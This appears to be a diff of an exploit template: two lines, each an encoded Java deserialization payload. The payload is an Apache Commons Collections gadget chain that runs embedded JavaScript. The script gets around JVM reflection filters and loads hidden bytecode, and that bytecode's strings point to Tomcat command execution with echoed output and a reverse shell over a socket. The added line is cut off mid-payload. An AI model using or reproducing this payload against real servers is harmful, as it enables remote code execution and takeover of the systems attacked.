-{{base64_decode("rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABHNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAHQAC25ld0luc3RhbmNldXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAAAc3EAfgATdXEAfgAYAAAAAXQAAmpzdAAPZ2V0RW5naW5lQnlOYW1ldXEAfgAbAAAAAXZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHNxAH4AE3VxAH4AGAAAAAF0LWx0cnkgewogIGxvYWQoIm5hc2hvcm46bW96aWxsYV9jb21wYXQuanMiKTsKfSBjYXRjaCAoZSkge30KZnVuY3Rpb24gZ2V0VW5zYWZlKCl7CiAgdmFyIHRoZVVuc2FmZU1ldGhvZCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5VbnNhZmUiKS5nZXREZWNsYXJlZEZpZWxkKCd0aGVVbnNhZmUnKTsKICB0aGVVbnNhZmVNZXRob2Quc2V0QWNjZXNzaWJsZSh0cnVlKTsgCiAgcmV0dXJuIHRoZVVuc2FmZU1ldGhvZC5nZXQobnVsbCk7Cn0KZnVuY3Rpb24gcmVtb3ZlQ2xhc3NDYWNoZShjbGF6eil7CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpOwogIHZhciBjbGF6ekFub255bW91c0NsYXNzID0gdW5zYWZlLmRlZmluZUFub255bW91c0NsYXNzKGNsYXp6LGphdmE
+{{base64_decode("rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABHNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyACBqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcgAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAHQAC25ld0luc3RhbmNldXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAAAc3EAfgATdXEAfgAYAAAAAXQAAmpzdAAPZ2V0RW5naW5lQnlOYW1ldXEAfgAbAAAAAXZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHNxAH4AE3VxAH4AGAAAAAF0LWx0cnkgewogIGxvYWQoIm5hc2hvcm46bW96aWxsYV9jb21wYXQuanMiKTsKfSBjYXRjaCAoZSkge30KZnVuY3Rpb24gZ2V0VW5zYWZlKCl7CiAgdmFyIHRoZVVuc2FmZU1ldGhvZCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5VbnNhZmUiKS5nZXREZWNsYXJlZEZpZWxkKCd0aGVVbnNhZmUnKTsKICB0aGVVbnNhZmVNZXRob2Quc2V0QWNjZXNzaWJsZSh0cnVlKTsgCiAgcmV0dXJuIHRoZVVuc2FmZU1ldGhvZC5nZXQobnVsbCk7Cn0KZnVuY3Rpb24gcmVtb3ZlQ2xhc3NDYWNoZShjbGF6eil7CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpOwogIHZhciBjbGF6ekFub255bW91c0NsYXNzID0gdW5zYWZlLmRlZmluZUFub255bW91c0NsYXNzKGNsYXp6LGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmxhbmcuQ2xhc3MiKS5nZXRSZXNvdXJjZUFzU3RyZWFtKCJDbGFzcy5jbGFzcyIpLnJlYWRBbGxCeXRlcygpLG51bGwpOwogIHZhciByZWZsZWN0aW9uRGF0YUZpZWxkID0gY2xhenpBbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJyZWZsZWN0aW9uRGF0YSIpOwogIHVuc2FmZS5wdXRPYmplY3QoY2xhenosdW5zYWZlLm9iamVjdEZpZWxkT2Zmc2V0KHJlZmxlY3Rpb25EYXRhRmllbGQpLG51bGwpOwp9CmZ1bmN0aW9uIGJ5cGFzc1JlZmxlY3Rpb25GaWx0ZXIoKSB7CiAgdmFyIHJlZmxlY3Rpb25DbGFzczsKICB0cnkgewogICAgcmVmbGVjdGlvbkNsYXNzID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImpkay5pbnRlcm5hbC5yZWZsZWN0LlJlZmxlY3Rpb24iKTsKICB9IGNhdGNoIChlcnJvcikgewogICAgcmVmbGVjdGlvbkNsYXNzID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoInN1bi5yZWZsZWN0LlJlZmxlY3Rpb24iKTsKICB9CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpOwogIHZhciBjbGFzc0J1ZmZlciA9IHJlZmxlY3Rpb25DbGFzcy5nZXRSZXNvdXJjZUFzU3RyZWFtKCJSZWZsZWN0aW9uLmNsYXNzIikucmVhZEFsbEJ5dGVzKCk7CiAgdmFyIHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcyA9IHVuc2FmZS5kZWZpbmVBbm9ueW1vdXNDbGFzcyhyZWZsZWN0aW9uQ2xhc3MsIGNsYXNzQnVmZmVyLCBudWxsKTsKICB2YXIgZmllbGRGaWx0ZXJNYXBGaWVsZCA9IHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJmaWVsZEZpbHRlck1hcCIpOwogIHZhciBtZXRob2RGaWx0ZXJNYXBGaWVsZCA9IHJlZmxlY3Rpb25Bbm9ueW1vdXNDbGFzcy5nZXREZWNsYXJlZEZpZWxkKCJtZXRob2RGaWx0ZXJNYXAiKTsKICBpZiAoZmllbGRGaWx0ZXJNYXBGaWVsZC5nZXRUeXBlKCkuaXNBc3NpZ25hYmxlRnJvbShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKSkpIHsKICAgIHVuc2FmZS5wdXRPYmplY3QocmVmbGVjdGlvbkNsYXNzLCB1bnNhZmUuc3RhdGljRmllbGRPZmZzZXQoZmllbGRGaWx0ZXJNYXBGaWVsZCksIGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuSGFzaE1hcCIpLmdldENvbnN0cnVjdG9yKCkubmV3SW5zdGFuY2UoKSk7CiAgfQogIGlmIChtZXRob2RGaWx0ZXJNYXBGaWVsZC5nZXRUeXBlKCkuaXNBc3NpZ25hYmxlRnJvbShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKSkpIHsKICAgIHVuc2FmZS5wdXRPYmplY3QocmVmbGVjdGlvbkNsYXNzLCB1bnNhZmUuc3RhdGljRmllbGRPZmZzZXQobWV0aG9kRmlsdGVyTWFwRmllbGQpLCBqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkhhc2hNYXAiKS5nZXRDb25zdHJ1Y3RvcigpLm5ld0luc3RhbmNlKCkpOwogIH0KICByZW1vdmVDbGFzc0NhY2hlKGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLmxhbmcuQ2xhc3MiKSk7Cn0KZnVuY3Rpb24gc2V0QWNjZXNzaWJsZShhY2Nlc3NpYmxlT2JqZWN0KXsKICAgIHZhciB1bnNhZmUgPSBnZXRVbnNhZmUoKTsKICAgIHZhciBvdmVycmlkZUZpZWxkID0gamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoImphdmEubGFuZy5yZWZsZWN0LkFjY2Vzc2libGVPYmplY3QiKS5nZXREZWNsYXJlZEZpZWxkKCJvdmVycmlkZSIpOwogICAgdmFyIG9mZnNldCA9IHVuc2FmZS5vYmplY3RGaWVsZE9mZnNldChvdmVycmlkZUZpZWxkKTsKICAgIHVuc2FmZS5wdXRCb29sZWFuKGFjY2Vzc2libGVPYmplY3QsIG9mZnNldCwgdHJ1ZSk7Cn0KZnVuY3Rpb24gZGVmaW5lQ2xhc3MoYnl0ZXMpewogIHZhciBjbHogPSBudWxsOwogIHZhciB2ZXJzaW9uID0gamF2YS5sYW5nLlN5c3RlbS5nZXRQcm9wZXJ0eSgiamF2YS52ZXJzaW9uIik7CiAgdmFyIHVuc2FmZSA9IGdldFVuc2FmZSgpCiAgdmFyIGNsYXNzTG9hZGVyID0gbmV3IGphdmEubmV0LlVSTENsYXNzTG9hZGVyKGphdmEubGFuZy5yZWZsZWN0LkFycmF5Lm5ld0luc3RhbmNlKGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLm5ldC5VUkwiKSwgMCkpOwogIHRyeXsKICAgIGlmICh2ZXJzaW9uLnNwbGl0KCIuIilbMF0gPj0gMTEpIHsKICAgICAgYnlwYXNzUmVmbGVjdGlvbkZpbHRlcigpOwogICAgZGVmaW5lQ2xhc3NNZXRob2QgPSBqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5sYW5nLkNsYXNzTG9hZGVyIikuZ2V0RGVjbGFyZWRNZXRob2QoImRlZmluZUNsYXNzIiwgamF2YS5sYW5nLkNsYXNzLmZvck5hbWUoIltCIiksamF2YS5sYW5nLkludGVnZXIuVFlQRSwgamF2YS5sYW5nLkludGVnZXIuVFlQRSk7CiAgICBzZXRBY2Nlc3NpYmxlKGRlZmluZUNsYXNzTWV0aG9kKTsKICAgIC8vIOe7lei/hyBzZXRBY2Nlc3NpYmxlIAogICAgY2x6ID0gZGVmaW5lQ2xhc3NNZXRob2QuaW52b2tlKGNsYXNzTG9hZGVyLCBieXRlcywgMCwgYnl0ZXMubGVuZ3RoKTsKICAgIH1lbHNlewogICAgICB2YXIgcHJvdGVjdGlvbkRvbWFpbiA9IG5ldyBqYXZhLnNlY3VyaXR5LlByb3RlY3Rpb25Eb21haW4obmV3IGphdmEuc2VjdXJpdHkuQ29kZVNvdXJjZShudWxsLCBqYXZhLmxhbmcucmVmbGVjdC5BcnJheS5uZXdJbnN0YW5jZShqYXZhLmxhbmcuQ2xhc3MuZm9yTmFtZSgiamF2YS5zZWN1cml0eS5jZXJ0LkNlcnRpZmljYXRlIiksIDApKSwgbnVsbCwgY2xhc3NMb2FkZXIsIFtdKTsKICAgICAgY2x6ID0gdW5zYWZlLmRlZmluZUNsYXNzKG51bGwsIGJ5dGVzLCAwLCBieXRlcy5sZW5ndGgsIGNsYXNzTG9hZGVyLCBwcm90ZWN0aW9uRG9tYWluKTsKICAgIH0KICB9Y2F0Y2goZXJyb3IpewogICAgZXJyb3IucHJpbnRTdGFja1RyYWNlKCk7CiAgfWZpbmFsbHl7CiAgICByZXR1cm4gY2x6OwogIH0KfQpmdW5jdGlvbiBiYXNlNjREZWNvZGVUb0J5dGUoc3RyKSB7CiAgdmFyIGJ0OwogIHRyeSB7CiAgICBidCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJzdW4ubWlzYy5CQVNFNjREZWNvZGVyIikubmV3SW5zdGFuY2UoKS5kZWNvZGVCdWZmZXIoc3RyKTsKICB9IGNhdGNoIChlKSB7CiAgICBidCA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0IikubmV3SW5zdGFuY2UoKS5nZXREZWNvZGVyKCkuZGVjb2RlKHN0cik7CiAgfQogIHJldHVybiBidDsKfQp2YXIgY29kZT0ieXY2NnZnQUFBQzhCWndvQUlBQ1NCd0NUQndDVUNnQUNBSlVLQUFNQWxnb0FJZ0NYQ2dDWUFKa0tBSmdBbWdvQUlnQ2JDQUNjQ2dBZ0FKMEtBSjRBbndvQW5nQ2dCd0NoQ2dDWUFLSUlBSXdLQUNrQW93Z0FwQWdBcFFjQXBnZ0Fwd2dBcUFjQXFRb0FJQUNxQ0FDckNBQ3NCd0N0Q3dBYkFLNExBQnNBcndnQXNBZ0FzUWNBc2dvQUlBQ3pCd0MwQ2dDMUFMWUlBTGNKQUg0QXVBZ0F1UW9BZmdDNkNBQzdCd0M4Q2dCK0FMMEtBQ2tBdmdnQXZ3a0FMZ0RBQndEQkNnQXVBTUlJQU1NS0FINEF4QW9BSUFERkNBREdDUUIrQU1jSUFNZ0tBQ0FBeVFnQXlnY0F5d2dBekFnQXpRb0FtQURPQ2dEUEFNUUlBTkFLQUNrQTBRZ0EwZ29BS1FEVENBRFVDZ0FwQU5VS0FDa0ExZ2dBMXdvQUtRRFlDQURaQ2dBdUFOb0tBSDRBMndnQTNBb0FmZ0RkQ0FEZUNnRGZBT0FLQUNrQTRRZ0E0Z2dBNHdnQTVBY0E1UW9BVVFDWENnQlJBT1lJQU9jS0FGRUE2QWdBNlFnQTZnZ0E2d2dBN0FvQTdRRHVDZ0R0QU84SEFQQUtBUEVBOGdvQVhBRHpDQUQwQ2dCY0FQVUtBRndBOWdvQVhBRDNDZ0R4QVBnS0FQRUErUW9BT0FEb0NBRDZDZ0FwQUpZSUFQc0tBTzBBL0FjQS9Rb0FMZ0QrQ2dCcUFQOEtBR29BOGdvQThRRUFDZ0JxQVFBS0FHb0JBUW9CQWdFRENnRUNBUVFLQVFVQkJnb0JCUUVIQlFBQUFBQUFBQUF5Q2dDWUFRZ0tBUEVCQ1FvQWFnRUtDQUVMQ2dBNEFKVUlBUXdJQVEwSEFRNEJBQlpqYkdGemN5UnFZWFpoSkd4aGJtY2tVM1J5YVc1bkFRQVJUR3BoZG1FdmJHRnVaeTlEYkdGemN6c0JBQWxUZVc1MGFHVjBhV01CQUFkaGNuSmhlU1JDQVFBR1BHbHVhWFErQVFBREtDbFdBUUFFUTI5a1pRRUFEMHhwYm1WT2RXMWlaWEpVWVdKc1pRRUFDa1Y0WTJWd2RHbHZibk1CQUFsc2IyRmtRMnhoYzNNQkFDVW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFIWlhobFkzVjBaUUVBSmloTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQUVaWGhsWXdFQUIzSmxkbVZ5YzJVQkFEa29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdUR3BoZG1FdmJHRnVaeTlKYm5SbFoyVnlPeWxNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNCQUFaamJHRnpjeVFCQUFwVGIzVnlZMlZHYVd4bEFRQUhRVFF1YW1GMllRd0JEd0NKQVFBZ2FtRjJZUzlzWVc1bkwwTnNZWE56VG05MFJtOTFibVJGZUdObGNIUnBiMjRCQUI1cVlYWmhMMnhoYm1jdlRtOURiR0Z6YzBSbFprWnZkVzVrUlhKeWIzSU1BUkFCRVF3QWd3RVNEQUNEQUlRSEFSTU1BUlFCRlF3QkZnRVhEQUVZQVJrQkFBZDBhSEpsWVdSekRBRWFBUnNIQVJ3TUFSMEJIZ3dCSHdFZ0FRQVRXMHhxWVhaaEwyeGhibWN2VkdoeVpXRmtPd3dCSVFFUkRBRWlBU01CQUFSb2RIUndBUUFHZEdGeVoyVjBBUUFTYW1GMllTOXNZVzVuTDFKMWJtNWhZbXhsQVFBR2RHaHBjeVF3QVFBSGFHRnVaR3hsY2dFQUhtcGhkbUV2YkdGdVp5OU9iMU4xWTJoR2FXVnNaRVY0WTJWd2RHbHZiZ3dCSkFFWkFRQUdaMnh2WW1Gc0FRQUtjSEp2WTJWemMyOXljd0VBRG1waGRtRXZkWFJwYkM5TWFYTjBEQUVsQVNZTUFSOEJKd0VBQTNKbGNRRUFDMmRsZEZKbGMzQnZibk5sQVFBUGFtRjJZUzlzWVc1bkwwTnNZWE56REFFb0FTa0JBQkJxWVhaaEwyeGhibWN2VDJKcVpXTjBCd0VxREFFckFTd0JBQWxuWlhSSVpXRmtaWElNQUg4QWdBRUFFR3BoZG1FdWJHRnVaeTVUZEhKcGJtY01BSThBaVFFQUEyTnRaQUVBRUdwaGRtRXZiR0Z1Wnk5VGRISnBibWNNQUlvQWl3d0JMUUV1QVFBSmMyVjBVM1JoZEhWekRBRXZBSUFCQUJGcVlYWmhMMnhoYm1jdlNXNTBaV2RsY2d3QWd3RXdBUUFrYjNKbkxtRndZV05vWlM1MGIyMWpZWFF1ZFhScGJDNWlkV1l1UW5sMFpVTm9kVzVyREFDSUFJa01BVEVCTWdFQUNITmxkRUo1ZEdWekRBQ0NBSUFCQUFKYlFnd0JNd0VwQVFBSFpHOVhjbWwwWlFFQUUycGhkbUV2YkdGdVp5OUZlR05sY0hScGIyNEJBQk5xWVhaaExtNXBieTVDZVhSbFFuVm1abVZ5QVFBRWQzSmhjQXdCTkFFMUJ3RTJBUUFBREFFM0FUZ0JBQkJqYjIxdFlXNWtJRzV2ZENCdWRXeHNEQUU1QVJFQkFBVWpJeU1qSXd3Qk9nRTdEQUU4QVQwQkFBRTZEQUUrQVQ4QkFDSmpiMjF0WVc1a0lISmxkbVZ5YzJVZ2FHOXpkQ0JtYjNKdFlYUWdaWEp5YjNJaERBRkFBVUVNQUkwQWpnRUFCVUJBUUVCQURBQ01BSXNCQUFkdmN5NXVZVzFsQndGQ0RBRkRBSXNNQVVRQkVRRUFBM2RwYmdFQUJIQnBibWNCQUFJdGJnRUFGbXBoZG1FdmJHRnVaeTlUZEhKcGJtZENkV1ptWlhJTUFVVUJSZ0VBQlNBdGJpQTBEQUZIQVJFQkFBSXZZd0VBQlNBdGRDQTBBUUFDYzJnQkFBSXRZd2NCU0F3QlNRRktEQUNNQVVzQkFCRnFZWFpoTDNWMGFXd3ZVMk5oYm01bGNnY0JUQXdCVFFGT0RBQ0RBVThCQUFKY1lRd0JVQUZSREFGU0FWTU1BVlFCRVF3QlZRRk9EQUZXQUlRQkFBY3ZZbWx1TDNOb0FRQUhZMjFrTG1WNFpRd0FqQUZYQVFBUGFtRjJZUzl1WlhRdlUyOWphMlYwREFGWUFTWU1BSU1CV1F3QldnRmJEQUZjQVZNSEFWME1BVjRCSmd3Qlh3RW1Cd0ZnREFGaEFUQU1BV0lBaEF3Qll3RmtEQUZsQVNZTUFXWUFoQUVBSFhKbGRtVnljMlVnWlhobFkzVjBaU0JsY25KdmNpd2diWE5uSUMwK0FRQUJJUUVBRTNKbGRtVnljMlVnWlhobFkzVjBaU0J2YXlFQkFBSkJOQUVBQjJadmNrNWhiV1VCQUFwblpYUk5aWE56WVdkbEFRQVVLQ2xNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNCQUJVb1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tWWUJBQkJxWVhaaEwyeGhibWN2VkdoeVpXRmtBUUFOWTNWeWNtVnVkRlJvY21WaFpBRUFGQ2dwVEdwaGRtRXZiR0Z1Wnk5VWFISmxZV1E3QVFBT1oyVjBWR2h5WldGa1IzSnZkWEFCQUJrb0tVeHFZWFpoTDJ4aGJtY3ZWR2h5WldGa1IzSnZkWEE3QVFBSVoyVjBRMnhoYzNNQkFCTW9LVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFRWjJWMFJHVmpiR0Z5WldSR2FXVnNaQUVBTFNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrT3dFQUYycGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrQVFBTmMyVjBRV05qWlhOemFXSnNaUUVBQkNoYUtWWUJBQU5uWlhRQkFDWW9UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQjJkbGRFNWhiV1VCQUFoamIyNTBZV2x1Y3dFQUd5aE1hbUYyWVM5c1lXNW5MME5vWVhKVFpYRjFaVzVqWlRzcFdnRUFEV2RsZEZOMWNHVnlZMnhoYzNNQkFBUnphWHBsQVFBREtDbEpBUUFWS0VrcFRHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0FRQUpaMlYwVFdWMGFHOWtBUUJBS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuTzF0TWFtRjJZUzlzWVc1bkwwTnNZWE56T3lsTWFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlRXVjBhRzlrT3dFQUdHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwMWxkR2h2WkFFQUJtbHVkbTlyWlFFQU9TaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREdGJUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQ0dkbGRFSjVkR1Z6QVFBRUtDbGJRZ0VBQkZSWlVFVUJBQVFvU1NsV0FRQUxibVYzU1c1emRHRnVZMlVCQUJRb0tVeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME93RUFFV2RsZEVSbFkyeGhjbVZrVFdWMGFHOWtBUUFWWjJWMFEyOXVkR1Y0ZEVOc1lYTnpURzloWkdWeUFRQVpLQ2xNYW1GMllTOXNZVzVuTDBOc1lYTnpURzloWkdWeU93RUFGV3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2dFQUJtVnhkV0ZzY3dFQUZTaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc3BXZ0VBQkhSeWFXMEJBQXB6ZEdGeWRITlhhWFJvQVFBVktFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bGFBUUFIY21Wd2JHRmpaUUVBUkNoTWFtRjJZUzlzWVc1bkwwTm9ZWEpUWlhGMVpXNWpaVHRNYW1GMllTOXNZVzVuTDBOb1lYSlRaWEYxWlc1alpUc3BUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdBUUFGYzNCc2FYUUJBQ2NvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1Z0TWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBZDJZV3gxWlU5bUFRQW5LRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxNYW1GMllTOXNZVzVuTDBsdWRHVm5aWEk3QVFBUWFtRjJZUzlzWVc1bkwxTjVjM1JsYlFFQUMyZGxkRkJ5YjNCbGNuUjVBUUFMZEc5TWIzZGxja05oYzJVQkFBWmhjSEJsYm1RQkFDd29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2VTNSeWFXNW5RblZtWm1WeU93RUFDSFJ2VTNSeWFXNW5BUUFSYW1GMllTOXNZVzVuTDFKMWJuUnBiV1VCQUFwblpYUlNkVzUwYVcxbEFRQVZLQ2xNYW1GMllTOXNZVzVuTDFKMWJuUnBiV1U3QVFBb0tGdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlRY205alpYTnpPd0VBRVdwaGRtRXZiR0Z1Wnk5UWNtOWpaWE56QVFBT1oyVjBTVzV3ZFhSVGRISmxZVzBCQUJjb0tVeHFZWFpoTDJsdkwwbHVjSFYwVTNSeVpXRnRPd0VBR0NoTWFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJUc3BWZ0VBREhWelpVUmxiR2x0YVhSbGNnRUFKeWhNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVEdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5T3dFQUIyaGhjMDVsZUhRQkFBTW9LVm9CQUFSdVpYaDBBUUFPWjJWMFJYSnliM0pUZEhKbFlXMEJBQWRrWlhOMGNtOTVBUUFuS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3lsTWFtRjJZUzlzWVc1bkwxQnliMk5sYzNNN0FRQUlhVzUwVm1Gc2RXVUJBQllvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3U1NsV0FRQVBaMlYwVDNWMGNIVjBVM1J5WldGdEFRQVlLQ2xNYW1GMllTOXBieTlQZFhSd2RYUlRkSEpsWVcwN0FRQUlhWE5EYkc5elpXUUJBQk5xWVhaaEwybHZMMGx1Y0hWMFUzUnlaV0Z0QVFBSllYWmhhV3hoWW14bEFRQUVjbVZoWkFFQUZHcGhkbUV2YVc4dlQzVjBjSFYwVTNSeVpXRnRBUUFGZDNKcGRHVUJBQVZtYkhWemFBRUFCWE5zWldWd0FRQUVLRW9wVmdFQUNXVjRhWFJXWVd4MVpRRUFCV05zYjNObEFDRUFmZ0FpQUFBQUFnQUlBSDhBZ0FBQkFJRUFBQUFBQUFnQWdnQ0FBQUVBZ1FBQUFBQUFCZ0FCQUlNQWhBQUNBSVVBQUFRUkFBZ0FFUUFBQXRFcXR3QUd1QUFIdGdBSVRDdTJBQWtTQ3JZQUMwMHNCTFlBREN3cnRnQU53QUFPd0FBT1RnTTJCQlVFTGI2aUFxTXRGUVF5T2dVWkJjY0FCcWNDanhrRnRnQVBPZ1laQmhJUXRnQVJtZ0FOR1FZU0VyWUFFWm9BQnFjQ2NSa0Z0Z0FKRWhPMkFBdE5MQVMyQUF3c0dRVzJBQTA2QnhrSHdRQVVtZ0FHcHdKT0dRZTJBQWtTRmJZQUMwMHNCTFlBREN3WkI3WUFEVG9IR1FlMkFBa1NGcllBQzAybkFCWTZDQmtIdGdBSnRnQVl0Z0FZRWhhMkFBdE5MQVMyQUF3c0dRZTJBQTA2QnhrSHRnQUp0Z0FZRWhtMkFBdE5wd0FRT2dnWkI3WUFDUkladGdBTFRTd0V0Z0FNTEJrSHRnQU5PZ2NaQjdZQUNSSWF0Z0FMVFN3RXRnQU1MQmtIdGdBTndBQWJ3QUFiT2dnRE5na1ZDUmtJdVFBY0FRQ2lBYWdaQ0JVSnVRQWRBZ0E2Q2hrS3RnQUpFaDYyQUF0TkxBUzJBQXdzR1FxMkFBMDZDeGtMdGdBSkVoOER2UUFndGdBaEdRc0R2UUFpdGdBak9nd1pDN1lBQ1JJa0JMMEFJRmtEc2dBbHh3QVBFaWE0QUNkWnN3QWxwd0FHc2dBbFU3WUFJUmtMQkwwQUlsa0RFaWhUdGdBandBQXBPZzBaRGNjQUJxY0JKU29aRGJZQUtyWUFL